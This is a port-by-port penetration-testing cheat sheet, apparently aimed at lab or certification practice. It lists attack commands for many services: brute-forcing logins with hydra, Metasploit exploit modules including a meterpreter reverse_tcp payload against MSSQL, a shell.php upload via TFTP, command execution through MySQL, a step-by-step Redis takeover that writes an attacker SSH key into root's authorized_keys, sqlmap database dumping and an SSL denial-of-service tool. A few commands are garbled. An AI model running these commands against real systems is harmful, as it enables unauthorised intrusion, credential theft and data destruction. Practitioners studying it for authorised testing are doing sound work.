Common Ports
21 - FTP
Many FTP servers allow anonymous users and might be misconfigured and give too much access. Always try to login as an anonymous user (anonymous:anonymous
). It is also important to remember the binary and ascii mode. If you upload a binary file you to put the server in binary mode typing binary
and the same with text-files, typing ascii
.
Connect to the FTP server:
ftp $ip
nc $ip 21
Anonymous FTP dump with Nmap:
nmap -v -p 21 --script=ftp-anon.nse $ip-254
Enumerate:
nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Bruteforce
hydra -l user -P /usr/share/john/password.lst [ftp://:21$ip](ftp://:21$ip)
Bruteforce with metasploit:
msfconsole -q
msf> search type: auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
Vulnerability scan:
nmap --script=ftp-* -p 21 $ip
22 - SSH
You can find the version of SSH either by scanning it with nmap or by connecting to it with nc
:
nc $ip 22
User enumeration:
msf > use auxiliary/scanner/ssh/ssh_enumusers
python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
Bruteforce:
hydra -v -V -l root -P /usr/share/wordlists/rockyou.txt $ip ssh
Bruteforce with list of users:
hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
23 - Telnet
Telnet is considered insecure mainly because it does not encrypt its traffic. Also a quick search in exploit-db will show that there are various RCE vulnerabilities on different versions that might be worth checking out.
Bruteforce:
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt $ip telnet
25 - SMTP
SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those messages are then routed to the SMTP-server which communicates the email to another server. The SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to query that database for possible email addresses. Notice that we cannot retrieve any emails from SMTP. We can only send emails.
Connect to SMTP:
nc $ip 25
telnet $ip 25
Possible commands to use after connection:
HELO -
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
Verify if root exists:
VRFY root
Ask the server if root belongs to a mailing list:
EXPN root
Check for commands:
nmap -script smtp-commands.nse $ip
Enumerate users:
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
Enumerate users with metasploit:
msf > use auxiliary/scanner/smtp/smtp_enum
Enumeration and vulnerability scanning:
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
Bruteforce:
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Testing for open relay:
telnet $ip 25
EHLO root
MAIL <FROM:root@target.com>
RCPT <TO:example@gmail.com>
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT
53 - DNS
Find name servers
host -t ns microsoft.com
Find email servers
host -t mx microsoft.com
Subdomain bruteforcing
for ip in $(cat list.txt); do host $ip.microsoft.com; done
Reverse dns lookup bruteforcing
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
Zone transfer request
host -l microsoft.com ns1.microsoft.com
dnsrecon -d [microsoft.com](<http://microsoft.com>) -t axfr
Finds nameservers for a given domain
host -t ns microsoft.com | cut -d " " -f 4 #
dnsenum microsoft.com
Nmap zone transfer scan
nmap [microsoft.com](<http://microsoft.com>) --script=dns-zone-transfer -p 53
Find the IP and authoritative servers
nslookup microsoft.com
UDP 69 - TFTP
This is a FTP server but it is using UDP.
If unauthenticated access is allowed with write permissions you can upload a shell:
tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
79 - Finger
Users enumeration:
finger-user-enum.pl -U users.txt -t $ip
Enumeration with user:
finger username@$ip
80 - HTTP
Nikto:
nikto -h $ip
nikto -h <http://$ip>
Enumeration with Nmap:
nmap --script=http-enum -p80 -n $ip/24
Nmap methods testing:
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Nmap vulnerability scanning:
nmap --script=http-vuln* $ip
Directory discovery:
wget <https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt>
gobuster dir -u <http://$ip> -w Top1000-RobotsDisallowed.txt
dirb $ip /usr/share/wordlists/dirb/common.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u $ip
gobuster dir -u [<http://$ip/>](<http://$ip/>) -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
gobuster dir -u [<http://$ip/>](<http://$ip/>) -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
cd /opt/dirsearch
python3 dirsearch.py -y <http://$ip/> -e .php
Wfuzz web bruteforcer:
wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test
wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ
Recurse level3
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
Banner grabbing:
./whatweb $ip # identifies all known services
Open a service using a port knock (Secured with Knockd):
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done
WordPress Scan - WordPress security scanner:
wpscan --url $ip/blog --proxy $ip:3129
RSH Enumeration - Unencrypted file transfer system:
msf > auxiliary/scanner/rservices/rsh_login
Bruteforcing authentication:
hydra $ip http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
Test against SQLi:
sqlmap -u "[<http://$ip/?query>](<http://$ip/?query>)" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql
Coldfusion vulnerability scanning:
nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
Bruteforce basic auth
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
88 - Kerberos
Kerberos is a protocol that is used for network authentication. Different versions are used by *nix and Windows. But if you see a machine with port 88 open you can be fairly certain that it is a Windows Domain Controller.
Test MS14-068
Passive network sniffing:
kerbcrack
User enumeration:
nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip
Memory password extraction (pass the ticket attacks): Mimikatz
110 - POP3
This service is used for fetching emails on a email server. If the server has this port open then probably it is an email server and other clients on the network access it to fetch their emails.
If you find usernames and passwords for email accounts you can check the mail using Telnet:
telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
111 - Rpc
Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC:
rpcbind -p 192.168.1.101
Connect to an RPC share without a username and password and enumerate privileges:
rpcclient --user="" --command=enumprivs -N $ip
Connect to an RPC share with a username and enumerate privledges:
rpcclient --user="<Username>" --command=enumprivs $ip
135 - MSRPC
The Windows RPC Protocol.
Enumerate (shows if any NFS mount is exposed):
rpcinfo -p $ip
nmap $ip --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_com
137 - NetBios
Dumping the netbios table:
nmap -Pn -sUC -p137 $ip
139/145 - SMB/Samba
Enumeration:
nmblookup -A $ip
enum4linux $ip
enum4linux -a $ip
smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
Quick enumeration:
nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
Quick vulnerability scan:
nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
Full enumeration and vulnerability scan:
nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
Full enumeration and vulnerability scan without brute force and dos:
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
All smb scripts authenticated scan:
nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
Enumerate users:
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
Manual Null Session Testing:
Windows → net use \\\\$ip\\IPC$ "" /u:""
Linux → smbclient -L //$ip
See version metasploit:
msf > use scanner/smb/smb_version
MultiExploit metasploit:
msf > use exploit/multi/samba/usermap_script
Mount:
smbclient //$ip/share -U username
Anonymous mount:
smbclient //$ip/share
Bruteforce:
hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
Connecting:
smbclient -L $ip
smbclient //$ip/tmp
smbclient -L \\\\\\\\$ip\\\\
smbclient //$ip/ipc$ -U john
Connecting with PSExec in Metasploit:
msf > use exploit/windows/smb/psexec
Connecting with PSExec with credentials:
psexec.py DOMAIN/username:password@$ip
161/162 - SNMP
SNMP is a network protocol used for collection, organizing and exchanging information between network devices. It runs on managed switches, routers, and server OSs for monitoring purposes. SNMP is accesed upon providing a valid community string within a UDP datagram to port 161. It is usually public. Within SNMP you can see running processes, open ports, users, windows version, installed software, etc.
Fix SNMP output values so they are human readable:
apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf
Enumeration:
for community in public private manager; do snmpwalk -c $community -v1 $ip; done
for community in public private manager; do snmpwalk -c $community -v1 $ip; done
snmpenum $ip public windows.txt
Less noisy:
snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
Based on UDP, stateless and susceptible to UDP spoofing:
nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public
snmpwalk -c public -v 2c 10.1.1.1 # version 2
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
snmp-check -t $ip -c public
SNMPv3 Enumeration:
nmap -sV -p 161 --script=snmp-info $ip/24
Automate the username enumeration process for SNMPv3:
apt-get install snmp snmp-mibs-downloader
wget <https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb>
SNMP Default Credentials:
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
Bruteforce the community names:
onesixtyone -c dict.txt -i $ip
Against cisco using metasploit:
msf > use auxiliary/scanner/snmp/cisco_config_tftp
Scanning using metasploit:
msf > use auxiliary/scanner/snmp/snmp_login
389/636 - LDAP
This port is usually used for Directories. Ldap directory can be understood a bit like the windows registry or a database-tree, since directory here means more like a telephone-list than a folder. Ldap is usually used to store user infomration in corporate structures. Web apps can use ldap for authentication which means you can perform ldap-injections.
Sometimes you can access ldap using an anonymous login and find some valuable data about users.
Enumeration:
ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"
443 - HTTPS
Encrypted version of the HTTP protocol. Always check for SSL vulnerabilites such as heartbleed.
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
First we need to investigate if the https-page is vulnerable to heartbleed:
sudo sslscan $ip:443
nmap -sV --script=ssl-heartbleed 192.168.101.8
Open a connection
openssl s_client -connect $ip:443
Basic SSL ciphers check:
nmap --script ssl-enum-ciphers -p 443 $ip
Exploiting with metasploit:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
Notes:
Look for unsafe ciphers such as Triple-DES and Blowfish
A very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...
443 - TLS
Transport Layer Security, or TLS, is a widely adopted security protocol designed to facilitate privacy and data security for communications over the Internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS evolved from SSL.
Enumerating supported protocols and cipher suites:
python prober.py $ip
Enumerating supported features and extensions:
nmap --script ssl-enum-ciphers -p443
Certificate review:
nmap -p443 --script ssl-cert
You should validate that:
The X.509 subject common name (CN) is correct for the service
The issuer is reputable and certificate chain valid
RSA or DSA public key values are longer than 2,048 bits
DH public parameters are longer than 2,048 bits
The certificate is valid and has not expired
The certificate is signed using SHA-256
Vulnerabilites:
POODLE against CBC mode ciphers within SSL 3.0
BEAST against CBC mode ciphers via TLS 1.0
Byte biases in RC4 ciphers across all SSL and TLS protocol versions
Validate if the key was generated with weak entropy:
nmap -p443 --script ssl-known-key $1
Test failback:
openssl s_client -connect $ip -no_tls1_2 -fallback_scsv
Test Dos:
thc-ssl-dos $ip
UDP 500 - IPsec
IPsec tries to solve the confidentiality/integrity problems of the IP protocol. It provides HMAC of the origin and encrypts data.
You can find hosts supporting ipsec with:
ike-scan -q $iprange
Validate the follow:
DH group can be insecure, allowing passive decryption.
Preshared key (PSK) might be cracked.
Obtaining the XAUTH once the PSK is known.
For more info, refer to:
https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/
587 - Submission
Outgoing smtp-port
If Postfix is run on it it could be vunerable to shellshock: https://www.exploit-db.com/exploits/34896/
631 - Cups
Common UNIX Printing System has become the standard for sharing printers on a linux-network. You will often see port 631 open in your priv-esc enumeration when you run netstat
. You can log in to it here: http://localhost:631/admin
You authenticate with the OS-users.
Find version. Test cups-config --version. If this does not work surf to http://localhost:631/printers and see the CUPS version in the title bar of your browser.
There are vulnerabilities for it so check your searchsploit.
1433 - MsSQL
Default port for Microsoft SQL database.
Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info $ip
Bruteforce MsSql with metasploit:
msf > use auxiliary/scanner/mssql/mssql_login
Gain shell using gathered credentials with metasploit:
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Log in to a MsSql server:
root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa
root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
1521 - Oracle DB
Enumeration:
tnscmd10g version -h $ip
tnscmd10g status -h $ip
Bruteforce the ISD with metasploit:
msf > use auxiliary/scanner/oracle/sid_brute
Connect to the database with sqlplus
1723 - PPTP
Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.
Enumeration:
nmap –Pn -sSV -p1723 $ip
Bruteforce:
cat dic.txt | thc-pptp-bruter –u admin $ip
2049 - NFS
Network file system This is a service used so that people can access certain parts of a remote filesystem. If this is badly configured it could mean that you grant excessive access to users.
Show Mountable NFS Shares:
nmap -sV --script=nfs-showmount $ip
Show all mounts:
showmount -e $ip
Mount a NFS share
mount $ip:/vol/share /mnt/nfs
2100 - Oracle XML DB
There are some exploits for this, so it is useful to check it out. You can use the default Oracle users to access to it. You can use the normal ftp protocol to access it.
Some default passwords here:
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
Default logins → sys:sys / scott:tiger
3306 - MySQL
Nmap scan:
nmap -sV -Pn -vv -script=mysql* $ip -p 3306
Vulnerability scan:
sqlmap -u '<http://$ip/login-off.asp>' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
Enumeration and vulnerability scanning:
nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
If Mysql is running as root and you have acces, you can run commands:
mysql> select do_system('id');
mysql> \\! sh
Always test the following:
username: root
password: root
mysql --host=$ip -u root -p
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname> -u ""@localhost
telnet $ip 3306
Configuration files:
cat /etc/my.cnf
MySQL commands cheat sheet:
http://cse.unl.edu/~sscott/ShowFiles/SQL/CheatSheet/SQLCheatSheet.html
If with a shell, find login credentials for the database:
/var/www/html/configuration.php
<?php
class JConfig {
var $mailfrom = 'admin@rainng.com';
var $fromname = 'testuser';
var $sendmail = '/usr/sbin/sendmail';
var $password = 'myPassowrd1234';
var $sitename = 'test';
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $offline_message = 'This site is down for maintenance. Please check back again soon.';
}
3389 - RDP
This is a proprietary protocol developed by windows to allow remote desktop.
Log in:
rdesktop -u guest -p guest $ip -g 94%
Bruteforce:
ncrack -vv --user administrator -P password-file.txt rdp://$ip
hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
5900 - VNC
VNC is used to get a screen for a remote host
You can use vncviewer to connect to a vnc-service
Vncviewer comes built-in in Kali
You do not have to set a username
VNC is run as a specific user, so when you use VNC it assumes that user
If you have dumped and cracked the user password on a machine does not mean you can use them to log in
To find the VNC password you can use the metasploit/meterpreter post exploit module that dumps VNC passwords
Scan for logins using metasploit:
msf > use auxiliary/scanner/vnc/vnc_login
Scan for no-auth:
msf > use auxiliary/scanner/vnc/vnc_none_auth
Meterpreter post exploitation module:
background
use post/windows/gather/credentials/vnc
set session X
exploit
5985 - WinRM
This is the Windows Remote Management tool. It allows remote management, meaning that any server that has this service allows us to connect to it if you have credentials and permissions to use it.
Connect:
cd /opt/
git clone <https://github.com/Hackplayers/evil-winrm.git>
evil-winrm -i $ip -u username -p password
6379 - Redis
Enumerate:
nmap -p6379 --script redis-info $ip
Client:
redis-cli -h $ip
Exploitation:
We first telnet to the server and check whether a successful connection is possible or not:
telnet $ip 6379
We then terminate the telnet session. Next, we generate our SSH key using the following command:
ssh-keygen -t rsa -C youremail@example.
Then, we enter the file where we want to save it:
Enter the file in which to save the key (/root/.ssh/id_rsa): ./ida_rsa_
Our key is generated; now we need to write it on the server. To do that need to install
redis-cli
:
sudo apt install redis-tools
Once it is installed, we go back to our generated key and add some random data before and after our key:
(echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > key.txt
Now we need to replace the keys in the database with ours. So we connect to the host using this:
redis-cli -h $ip
Next we flush the keys using the following command:
redis-cli -h $ip -p 6350 flushall
Now we need to set our keys into the database. We do this using the following command::
cat redis.txt | redis-cli –h $ip –p 6451 -x set bb
Once that's done, we need to copy the uploaded key into the
.ssh
folder; first, we check the current folder with this:
config get dir
Now we change our directory to
/root/.ssh/
:
config set dir /root/.ssh/
Next, we change the name of our file using
config set dbfilename "authorized_keys"
and save usingsave
.Now we try to ssh into the machine:
ssh -i id_rsa username@$ip
8080 - Tomcat (one of the most common)
Tomcat suffers from default passwords. There is even a module in metasploit that enumerates common tomcat passwords. And another module for exploiting it and giving you a shell.
Tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations:
msf > use auxiliary/admin/http/tomcat_utf8_traversal
msf auxiliary(tomcat_utf8_traversal) > show actions
...actions...
msf auxiliary(tomcat_utf8_traversal) > set ACTION < action-name >
msf auxiliary(tomcat_utf8_traversal) > show options
...show and set options...
msf auxiliary(tomcat_utf8_traversal) > run
Enumerating Apache Tomcat's usernames via malformed requests to j_security_check, which can be found in the web administration package. It should work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18:
msf > use auxiliary/scanner/http/tomcat_enum
msf auxiliary(tomcat_enum) > show actions
...actions...
msf auxiliary(tomcat_enum) > set ACTION < action-name >
msf auxiliary(tomcat_enum) > show options
...show and set options...
msf auxiliary(tomcat_enum) > run
Login to a Tomcat Application Manager instance using a specific user/pass:
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show actions
...actions...
msf auxiliary(tomcat_mgr_login) > set ACTION < action-name >
msf auxiliary(tomcat_mgr_login) > show options
...show and set options...
msf auxiliary(tomcat_mgr_login) > run
8080 - WebDav
Test:
davtest -move -sendbd auto -url http://:8080$ip/webdav/
cadaver http://:8080$ip/webdav/
11211 - Memcached
Enumerate:
nmap -p11211 --script memcached-info $ip
Extract data with metasploit:
msf > use auxiliary/gather/memcached_extractor
Last updated
Was this helpful?